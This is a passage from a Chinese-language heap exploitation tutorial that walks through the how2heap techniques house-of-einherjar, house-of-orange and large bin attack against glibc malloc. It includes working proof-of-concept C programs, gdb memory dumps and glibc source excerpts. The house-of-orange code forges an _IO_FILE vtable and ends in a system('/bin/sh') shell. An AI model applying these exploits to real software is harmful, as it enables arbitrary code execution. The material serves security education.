Our fake chunk size is now 0xffff80024d7d6811 (b.size + fake_prev_size)
Now we can call malloc() and it will begin in our fake chunk: 0x7ffdb337b800
house-of-einherjar 是一种利用 malloc 来返回一个附近地址的任意指针。它要求有一个单字节溢出漏洞,覆盖掉 next chunk 的 size 字段并清除 PREV_IN_USE
标志,然后还需要覆盖 prev_size 字段为 fake chunk 的大小。当 next chunk 被释放时,它会发现前一个 chunk 被标记为空闲状态,然后尝试合并堆块。只要我们精心构造一个 fake chunk,让合并后的堆块范围到 fake chunk 处,那下一次 malloc 将返回我们想要的地址。比起前面所讲过的 poison-null-byte ,更加强大,但是要求的条件也更多一点,比如一个堆信息泄漏。
首先分配一个假设存在 off_by_one 溢出的 chunk a,然后在栈上创建我们的 fake chunk,chunk 大小随意,只要是 small chunk 就可以了:
gef➤ x/8gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x4141414141414141 0x4141414141414141
0x603020: 0x4141414141414141 0x0000000000020fe1 <-- top chunk
0x603030: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx &fake_chunk
0x7fffffffdcb0: 0x0000000000000080 0x0000000000000080 <-- fake chunk
0x7fffffffdcc0: 0x00007fffffffdcb0 0x00007fffffffdcb0
0x7fffffffdcd0: 0x00007fffffffdcb0 0x00007fffffffdcb0
0x7fffffffdce0: 0x00007fffffffddd0 0xffa7b97358729300
接下来创建 chunk b,并利用 chunk a 的溢出将 size 字段覆盖掉,清除了 PREV_INUSE
标志,chunk b 就会以为前一个 chunk 是一个 free chunk 了:
gef➤ x/8gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x4141414141414141 0x4141414141414141
0x603020: 0x4141414141414141 0x0000000000000100 <-- chunk b
0x603030: 0x0000000000000000 0x0000000000000000
原本 chunk b 的 size 字段应该为 0x101,在这里我们选择 malloc(0xf8) 作为 chunk b 也是出于方便的目的,覆盖后只影响了标志位,没有影响到大小。
接下来根据 fake chunk 在栈上的位置修改 chunk b 的 prev_size 字段。计算方法是用 chunk b 的起始地址减去 fake chunk 的起始地址,同时为了绕过检查,还需要将 fake chunk 的 size 字段与 chunk b 的 prev_size 字段相匹配:
gef➤ x/8gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x4141414141414141 0x4141414141414141
0x603020: 0xffff800000605370 0x0000000000000100 <-- chunk b <-- prev_size
0x603030: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx &fake_chunk
0x7fffffffdcb0: 0x0000000000000080 0xffff800000605370 <-- fake chunk <-- size
0x7fffffffdcc0: 0x00007fffffffdcb0 0x00007fffffffdcb0
0x7fffffffdcd0: 0x00007fffffffdcb0 0x00007fffffffdcb0
0x7fffffffdce0: 0x00007fffffffddd0 0xadeb3936608e0600
释放 chunk b,这时因为 PREV_INUSE
为零,unlink 会根据 prev_size 去寻找上一个 free chunk,并将它和当前 chunk 合并。从 arena 里可以看到:
gef➤ heap arenas
Arena (base=0x7ffff7dd1b20, top=0x7fffffffdcb0, last_remainder=0x0, next=0x7ffff7dd1b20, next_free=0x0, system_mem=0x21000)
合并的过程在 poison-null-byte 那里也讲过了。
最后当我们再次 malloc,其返回的地址将是 fake chunk 的地址:
gef➤ x/8gx &fake_chunk
0x7fffffffdcb0: 0x0000000000000080 0x0000000000000021 <-- chunk d
0x7fffffffdcc0: 0x4141414141414141 0x4141414141414141
0x7fffffffdcd0: 0x00007fffffffdcb0 0xffff800000626331
0x7fffffffdce0: 0x00007fffffffddd0 0xbdf40e22ccf46c00
house_of_orange
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int winner (char *ptr);
int main() {
char *p1, *p2;
size_t io_list_all, *top;
p1 = malloc(0x400 - 0x10);
top = (size_t *) ((char *) p1 + 0x400 - 0x10);
top[1] = 0xc01;
p2 = malloc(0x1000);
io_list_all = top[2] + 0x9a8;
top[3] = io_list_all - 0x10;
memcpy((char *) top, "/bin/sh\x00", 8);
top[1] = 0x61;
_IO_FILE *fp = (_IO_FILE *) top;
fp->_mode = 0; // top+0xc0
fp->_IO_write_base = (char *) 2; // top+0x20
fp->_IO_write_ptr = (char *) 3; // top+0x28
size_t *jump_table = &top[12]; // controlled memory
jump_table[3] = (size_t) &winner;
*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8
malloc(1);
return 0;
}
int winner(char *ptr) {
system(ptr);
return 0;
}
$ gcc -g house_of_orange.c
$ ./a.out
*** Error in `./a.out': malloc(): memory corruption: 0x00007f3daece3520 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f3dae9957e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7f3dae9a013e]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7f3dae9a2184]
./a.out[0x4006cc]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f3dae93e830]
./a.out[0x400509]
======= Memory map: ========
00400000-00401000 r-xp 00000000 08:01 919342 /home/firmy/how2heap/a.out
00600000-00601000 r--p 00000000 08:01 919342 /home/firmy/how2heap/a.out
00601000-00602000 rw-p 00001000 08:01 919342 /home/firmy/how2heap/a.out
01e81000-01ec4000 rw-p 00000000 00:00 0 [heap]
7f3da8000000-7f3da8021000 rw-p 00000000 00:00 0
7f3da8021000-7f3dac000000 ---p 00000000 00:00 0
7f3dae708000-7f3dae71e000 r-xp 00000000 08:01 398989 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae71e000-7f3dae91d000 ---p 00016000 08:01 398989 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae91d000-7f3dae91e000 rw-p 00015000 08:01 398989 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae91e000-7f3daeade000 r-xp 00000000 08:01 436912 /lib/x86_64-linux-gnu/libc-2.23.so
7f3daeade000-7f3daecde000 ---p 001c0000 08:01 436912 /lib/x86_64-linux-gnu/libc-2.23.so
7f3daecde000-7f3daece2000 r--p 001c0000 08:01 436912 /lib/x86_64-linux-gnu/libc-2.23.so
7f3daece2000-7f3daece4000 rw-p 001c4000 08:01 436912 /lib/x86_64-linux-gnu/libc-2.23.so
7f3daece4000-7f3daece8000 rw-p 00000000 00:00 0
7f3daece8000-7f3daed0e000 r-xp 00000000 08:01 436908 /lib/x86_64-linux-gnu/ld-2.23.so
7f3daeef4000-7f3daeef7000 rw-p 00000000 00:00 0
7f3daef0c000-7f3daef0d000 rw-p 00000000 00:00 0
7f3daef0d000-7f3daef0e000 r--p 00025000 08:01 436908 /lib/x86_64-linux-gnu/ld-2.23.so
7f3daef0e000-7f3daef0f000 rw-p 00026000 08:01 436908 /lib/x86_64-linux-gnu/ld-2.23.so
7f3daef0f000-7f3daef10000 rw-p 00000000 00:00 0
7ffe8eba6000-7ffe8ebc7000 rw-p 00000000 00:00 0 [stack]
7ffe8ebee000-7ffe8ebf1000 r--p 00000000 00:00 0 [vvar]
7ffe8ebf1000-7ffe8ebf3000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
$ whoami
firmy
$ exit
Aborted (core dumped)
house-of-orange 是一种利用堆溢出修改 _IO_list_all
指针的利用方法。它要求能够泄漏堆和 libc。我们知道一开始的时候,整个堆都属于 top chunk,每次申请内存时,就从 top chunk 中划出请求大小的堆块返回给用户,于是 top chunk 就越来越小。
当某一次 top chunk 的剩余大小已经不能够满足请求时,就会调用函数 sysmalloc()
分配新内存,这时可能会发生两种情况,一种是直接扩充 top chunk,另一种是调用 mmap 分配一块新的 top chunk。具体调用哪一种方法是由申请大小决定的,为了能够使用前一种扩展 top chunk,需要请求小于阀值 mp_.mmap_threshold
:
if (av == NULL
|| ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
&& (mp_.n_mmaps < mp_.n_mmaps_max)))
{
同时,为了能够调用 sysmalloc()
中的 _int_free()
,需要 top chunk 大于 MINSIZE
,即 0x10:
if (old_size >= MINSIZE)
{
_int_free (av, old_top, 1);
}
当然,还得绕过下面两个限制条件:
/*
If not the first time through, we require old_size to be
at least MINSIZE and to have prev_inuse set.
*/
assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
/* Precondition: not enough current space to satisfy nb request */
assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
即满足 old_size 小于 nb+MINSIZE
,PREV_INUSE
标志位为 1,old_top+old_size
页对齐这几个条件。
首先分配一个大小为 0x400 的 chunk:
gef➤ x/4gx p1-0x10
0x602000: 0x0000000000000000 0x0000000000000401 <-- chunk p1
0x602010: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx p1-0x10+0x400
0x602400: 0x0000000000000000 0x0000000000020c01 <-- top chunk
0x602410: 0x0000000000000000 0x0000000000000000
默认情况下,top chunk 大小为 0x21000,减去 0x400,所以此时的大小为 0x20c00,另外 PREV_INUSE 被设置。
现在假设存在溢出漏洞,可以修改 top chunk 的数据,于是我们将 size 字段修改为 0xc01。这样就可以满足上面所说的条件:
gef➤ x/4gx p1-0x10+0x400
0x602400: 0x0000000000000000 0x0000000000000c01 <-- top chunk
0x602410: 0x0000000000000000 0x0000000000000000
紧接着,申请一块大内存,此时由于修改后的 top chunk size 不能满足需求,则调用 sysmalloc 的第一种方法扩充 top chunk,结果是在 old_top 后面新建了一个 top chunk 用来存放 new_top,然后将 old_top 释放,即被添加到了 unsorted bin 中:
gef➤ x/4gx p1-0x10+0x400
0x602400: 0x0000000000000000 0x0000000000000be1 <-- old top chunk [be freed]
0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
gef➤ x/4gx p1-0x10+0x400+0xbe0
0x602fe0: 0x0000000000000be0 0x0000000000000010 <-- fencepost chunk 1
0x602ff0: 0x0000000000000000 0x0000000000000011 <-- fencepost chunk 2
gef➤ x/4gx p2-0x10
0x623000: 0x0000000000000000 0x0000000000001011 <-- chunk p2
0x623010: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx p2-0x10+0x1010
0x624010: 0x0000000000000000 0x0000000000020ff1 <-- new top chunk
0x624020: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602400, bk=0x602400
→ Chunk(addr=0x602410, size=0xbe0, flags=PREV_INUSE)
于是就泄漏出了 libc 地址。另外可以看到 old top chunk 被缩小了 0x20,缩小的空间被用于放置 fencepost chunk。此时的堆空间应该是这样的:
+---------------+
| p1 |
+---------------+
| old top-0x20 |
+---------------+
| fencepost 1 |
+---------------+
| fencepost 2 |
+---------------+
| ... |
+---------------+
| p2 |
+---------------+
| new top |
+---------------+
详细过程如下:
if (old_size != 0)
{
/*
Shrink old_top to insert fenceposts, keeping size a
multiple of MALLOC_ALIGNMENT. We know there is at least
enough space in old_top to do this.
*/
old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
set_head (old_top, old_size | PREV_INUSE);
/*
Note that the following assignments completely overwrite
old_top when old_size was previously MINSIZE. This is
intentional. We need the fencepost, even if old_top otherwise gets
lost.
*/
chunk_at_offset (old_top, old_size)->size =
(2 * SIZE_SZ) | PREV_INUSE;
chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
(2 * SIZE_SZ) | PREV_INUSE;
/* If possible, release the rest. */
if (old_size >= MINSIZE)
{
_int_free (av, old_top, 1);
}
}
根据放入 unsorted bin 中 old top chunk 的 fd/bk 指针,可以推算出 _IO_list_all
的地址。然后通过溢出将 old top 的 bk 改写为 _IO_list_all-0x10
,这样在进行 unsorted bin attack 时,就会将 _IO_list_all
修改为 &unsorted_bin-0x10
:
/* remove from unsorted list */
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
gef➤ x/4gx p1-0x10+0x400
0x602400: 0x0000000000000000 0x0000000000000be1
0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510
这里讲一下 glibc 中的异常处理。一般在出现内存错误时,会调用函数 malloc_printerr()
打印出错信息,我们顺着代码一直跟踪下去:
static void
malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
{
[...]
if ((action & 5) == 5)
__libc_message (action & 2, "%s\n", str);
else if (action & 1)
{
char buf[2 * sizeof (uintptr_t) + 1];
buf[sizeof (buf) - 1] = '\0';
char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
while (cp > buf)
*--cp = '0';
__libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
__libc_argv[0] ? : "<unknown>", str, cp);
}
else if (action & 2)
abort ();
}
调用 __libc_message
:
// sysdeps/posix/libc_fatal.c
/* Abort with an error message. */
void
__libc_message (int do_abort, const char *fmt, ...)
{
[...]
if (do_abort)
{
BEFORE_ABORT (do_abort, written, fd);
/* Kill the application. */
abort ();
}
}
do_abort
调用 fflush
,即 _IO_flush_all_lockp
:
// stdlib/abort.c
#define fflush(s) _IO_flush_all_lockp (0)
if (stage == 1)
{
++stage;
fflush (NULL);
}
// libio/genops.c
int
_IO_flush_all_lockp (int do_lock)
{
int result = 0;
struct _IO_FILE *fp;
int last_stamp;
#ifdef _IO_MTSAFE_IO
__libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
if (do_lock)
_IO_lock_lock (list_all_lock);
#endif
last_stamp = _IO_list_all_stamp;
fp = (_IO_FILE *) _IO_list_all; // 将其覆盖
while (fp != NULL)
{
run_fp = fp;
if (do_lock)
_IO_flockfile (fp);
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
#endif
)
&& _IO_OVERFLOW (fp, EOF) == EOF) // 将其修改为 system 函数
result = EOF;
if (do_lock)
_IO_funlockfile (fp);
run_fp = NULL;
if (last_stamp != _IO_list_all_stamp)
{
/* Something was added to the list. Start all over again. */
fp = (_IO_FILE *) _IO_list_all;
last_stamp = _IO_list_all_stamp;
}
else
fp = fp->_chain; // 指向我们指定的区域
}
#ifdef _IO_MTSAFE_IO
if (do_lock)
_IO_lock_unlock (list_all_lock);
__libc_cleanup_region_end (0);
#endif
return result;
}
_IO_list_all
是一个 _IO_FILE_plus
类型的对象,我们的目的就是将 _IO_list_all
指针改写为一个伪造的指针,它的 _IO_OVERFLOW
指向 system,并且前 8 字节被设置为 '/bin/sh',所以对 _IO_OVERFLOW(fp, EOF)
的调用最终会变成对 system('/bin/sh')
的调用。
// libio/libioP.h
/* We always allocate an extra word following an _IO_FILE.
This contains a pointer to the function jump table used.
This is for compatibility with C++ streambuf; the word can
be used to smash to a pointer to a virtual function table. */
struct _IO_FILE_plus
{
_IO_FILE file;
const struct _IO_jump_t *vtable;
};
// libio/libio.h
struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags
/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
#if 0
int _blksize;
#else
int _flags2;
#endif
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */
#define __HAVE_COLUMN /* temporary */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
/* char* _save_gptr; char* _save_egptr; */
_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
其中有一个指向函数跳转表的指针,_IO_jump_t
的结构如下:
// libio/libioP.h
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
get_column;
set_column;
#endif
};
伪造 _IO_jump_t
中的 __overflow
为 system 函数的地址,从而达到执行 shell 的目的。
当发生内存错误进入 _IO_flush_all_lockp
后,_IO_list_all
仍然指向 unsorted bin,这并不是一个我们能控制的地址。所以需要通过 fp->_chain
来将 fp 指向我们能控制的地方。所以将 size 字段设置为 0x61,因为此时 _IO_list_all
是 &unsorted_bin-0x10
,偏移 0x60 位置上是 smallbins[5]。此时,如果触发一个不适合的 small chunk 分配,malloc 就会将 old top 从 unsorted bin 放回 smallbins[5] 中。而在 _IO_FILE
结构中,偏移 0x60 指向 struct _IO_marker *_markers
,偏移 0x68 指向 struct _IO_FILE *_chain
,这两个值正好是 old top 的起始地址。这样 fp 就指向了 old top,这是一个我们能够控制的地址。
在将 _IO_OVERFLOW
修改为 system 的时候,有一些条件检查:
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
#endif
)
&& _IO_OVERFLOW (fp, EOF) == EOF) // 需要修改为 system 函数
// libio/libio.h
struct _IO_wide_data *_wide_data;
/* Extra data for wide character streams. */
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */
__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;
wchar_t _shortbuf[1];
const struct _IO_jump_t *_wide_vtable;
};
所以这里我们设置 fp->_mode = 0
,fp->_IO_write_base = (char *) 2
和 fp->_IO_write_ptr = (char *) 3
,从而绕过检查。
然后,就是修改 _IO_jump_t
,将其指向 winner:
gef➤ x/30gx p1-0x10+0x400
0x602400: 0x0068732f6e69622f 0x0000000000000061 <-- old top
0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510 <-- bk points to io_list_all-0x10
0x602420: 0x0000000000000002 0x0000000000000003 <-- _IO_write_base, _IO_write_ptr
0x602430: 0x0000000000000000 0x0000000000000000
0x602440: 0x0000000000000000 0x0000000000000000
0x602450: 0x0000000000000000 0x0000000000000000
0x602460: 0x0000000000000000 0x0000000000000000
0x602470: 0x0000000000000000 0x00000000004006d3 <-- winner
0x602480: 0x0000000000000000 0x0000000000000000
0x602490: 0x0000000000000000 0x0000000000000000
0x6024a0: 0x0000000000000000 0x0000000000000000
0x6024b0: 0x0000000000000000 0x0000000000000000
0x6024c0: 0x0000000000000000 0x0000000000000000
0x6024d0: 0x0000000000000000 0x0000000000602460 <-- vtable
0x6024e0: 0x0000000000000000 0x0000000000000000
gef➤ p *((struct _IO_FILE_plus *) 0x602400)
$1 = {
file = {
_flags = 0x6e69622f,
_IO_read_ptr = 0x61 <error: Cannot access memory at address 0x61>,
_IO_read_end = 0x7ffff7dd1b78 <main_arena+88> "\020@b",
_IO_read_base = 0x7ffff7dd2510 "",
_IO_write_base = 0x2 <error: Cannot access memory at address 0x2>,
_IO_write_ptr = 0x3 <error: Cannot access memory at address 0x3>,
_IO_write_end = 0x0,
_IO_buf_base = 0x0,
_IO_buf_end = 0x0,
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x0,
_fileno = 0x0,
_flags2 = 0x0,
_old_offset = 0x4006d3,
_cur_column = 0x0,
_vtable_offset = 0x0,
_shortbuf = "",
_lock = 0x0,
_offset = 0x0,
_codecvt = 0x0,
_wide_data = 0x0,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0x0,
_mode = 0x0,
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x602460
}
最后随意分配一个 chunk,由于 size<= 2*SIZE_SZ
,所以会触发 _IO_flush_all_lockp
中的 _IO_OVERFLOW
函数,获得 shell。
for (;; )
{
int iters = 0;
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (victim->size > av->system_mem, 0))
malloc_printerr (check_action, "malloc(): memory corruption",
chunk2mem (victim), av);
size = chunksize (victim);
到此,how2heap 里全部的堆利用方法就全部讲完了。
3.1.9 Linux 堆利用(四)
how2heap
large_bin_attack
#include<stdio.h>
#include<stdlib.h>
int main() {
unsigned long stack_var1 = 0;
unsigned long stack_var2 = 0;
fprintf(stderr, "The targets we want to rewrite on stack:\n");
fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
unsigned long *p1 = malloc(0x100);
fprintf(stderr, "Now, we allocate the first chunk: %p\n", p1 - 2);
malloc(0x10);
unsigned long *p2 = malloc(0x400);
fprintf(stderr, "Then, we allocate the second chunk(large chunk): %p\n", p2 - 2);
malloc(0x10);
unsigned long *p3 = malloc(0x400);
fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %p\n\n", p3 - 2);
malloc(0x10);
// deal with tcache - libc-2.26
// int *a[10], *b[10], i;
// for (i = 0; i < 7; i++) {
// a[i] = malloc(0x100);
// b[i] = malloc(0x400);
// }
// for (i = 0; i < 7; i++) {
// free(a[i]);
// free(b[i]);
// }
free(p1);
free(p2);
fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted bin\n");
malloc(0x30);
fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist\n\n");
p2[-1] = 0x3f1;
p2[0] = 0;
p2[2] = 0;
p2[1] = (unsigned long)(&stack_var1 - 2);
p2[3] = (unsigned long)(&stack_var2 - 4);
fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunk\n\n");
free(p3);
malloc(0x30);
fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:\n");
fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
}
$ gcc -g large_bin_attack.c
$ ./a.out
The targets we want to rewrite on stack:
stack_var1 (0x7fffffffdeb0): 0
stack_var2 (0x7fffffffdeb8): 0
Now, we allocate the first chunk: 0x555555757000
Then, we allocate the second chunk(large chunk): 0x555555757130
Finally, we allocate the third chunk(large chunk): 0x555555757560
Now, We free the first and the second chunks now and they will be inserted in the unsorted bin
Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist
Now we use a vulnerability to overwrite the freed second chunk
Finally, we free the third chunk and malloc again, targets should have already been rewritten:
stack_var1 (0x7fffffffdeb0): 0x555555757560
stack_var2 (0x7fffffffdeb8): 0x555555757560
该技术可用于修改任意地址的值,例如栈上的变量 stack_var1 和 stack_var2。在实践中常常作为其他漏洞利用的前奏,例如在 fastbin attack 中用于修改全局变量 global_max_fast 为一个很大的值。
首先我们分配 chunk p1, p2 和 p3,并且在它们之间插入其他的 chunk 以防止在释放时被合并。此时的内存布局如下:
gef➤ x/2gx &stack_var1
0x7fffffffde70: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx p1-2
0x555555757000: 0x0000000000000000 0x0000000000000111 <-- p1
0x555555757010: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p2-6
0x555555757110: 0x0000000000000000 0x0000000000000021
0x555555757120: 0x0000000000000000 0x0000000000000000
0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2
0x555555757140: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p3-6
0x555555757540: 0x0000000000000000 0x0000000000000021
0x555555757550: 0x0000000000000000 0x0000000000000000
0x555555757560: 0x0000000000000000 0x0000000000000411 <-- p3
0x555555757570: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p3+(0x410/8)-2
0x555555757970: 0x0000000000000000 0x0000000000000021
0x555555757980: 0x0000000000000000 0x0000000000000000
0x555555757990: 0x0000000000000000 0x0000000000020671 <-- top
0x5555557579a0: 0x0000000000000000 0x0000000000000000
然后依次释放掉 p1 和 p2,这两个 free chunk 将被放入 unsorted bin:
gef➤ x/8gx p1-2
0x555555757000: 0x0000000000000000 0x0000000000000111 <-- p1 [be freed]
0x555555757010: 0x00007ffff7dd3b78 0x0000555555757130
0x555555757020: 0x0000000000000000 0x0000000000000000
0x555555757030: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2 [be freed]
0x555555757140: 0x0000555555757000 0x00007ffff7dd3b78
0x555555757150: 0x0000000000000000 0x0000000000000000
0x555555757160: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757130, bk=0x555555757000
→ Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE) → Chunk(addr=0x555555757010, size=0x110, flags=PREV_INUSE)
[+] Found 2 chunks in unsorted bin.
接下来随便 malloc 一个 chunk,则 p1 被切分为两块,一块作为分配的 chunk 返回,剩下的一块继续留在 unsorted bin(p1 的作用就在这里,如果没有 p1,那么切分的将是 p2)。而 p2 则被整理回对应的 large bin 链表中:
gef➤ x/14gx p1-2
0x555555757000: 0x0000000000000000 0x0000000000000041 <-- p1-1
0x555555757010: 0x00007ffff7dd3c78 0x00007ffff7dd3c78
0x555555757020: 0x0000000000000000 0x0000000000000000
0x555555757030: 0x0000000000000000 0x0000000000000000
0x555555757040: 0x0000000000000000 0x00000000000000d1 <-- p1-2 [be freed]
0x555555757050: 0x00007ffff7dd3b78 0x00007ffff7dd3b78 <-- fd, bk
0x555555757060: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2 [be freed]
0x555555757140: 0x00007ffff7dd3f68 0x00007ffff7dd3f68 <-- fd, bk
0x555555757150: 0x0000555555757130 0x0000555555757130 <-- fd_nextsize, bk_nextsize
0x555555757160: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757040, bk=0x555555757040
→ Chunk(addr=0x555555757050, size=0xd0, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.
gef➤ heap bins large
[ Large Bins for arena 'main_arena' ]
[+] large_bins[63]: fw=0x555555757130, bk=0x555555757130
→ Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)
[+] Found 1 chunks in 1 large non-empty bins.
整理的过程如下所示,需要注意的是 large bins 中 chunk 按 fd 指针的顺序从大到小排列,如果大小相同则按照最近使用顺序排列:
/* place chunk in bin */
if (in_smallbin_range (size))
{
[ ... ]
}
else
{
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
/* maintain large bins in sorted order */
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
{
[ ... ]
}
else
{
assert ((fwd->size & NON_MAIN_ARENA) == 0);
while ((unsigned long) size < fwd->size)
{
[ ... ]
}
if ((unsigned long) size == (unsigned long) fwd->size)
[ ... ]
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
}
}
else
[ ... ]
}
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
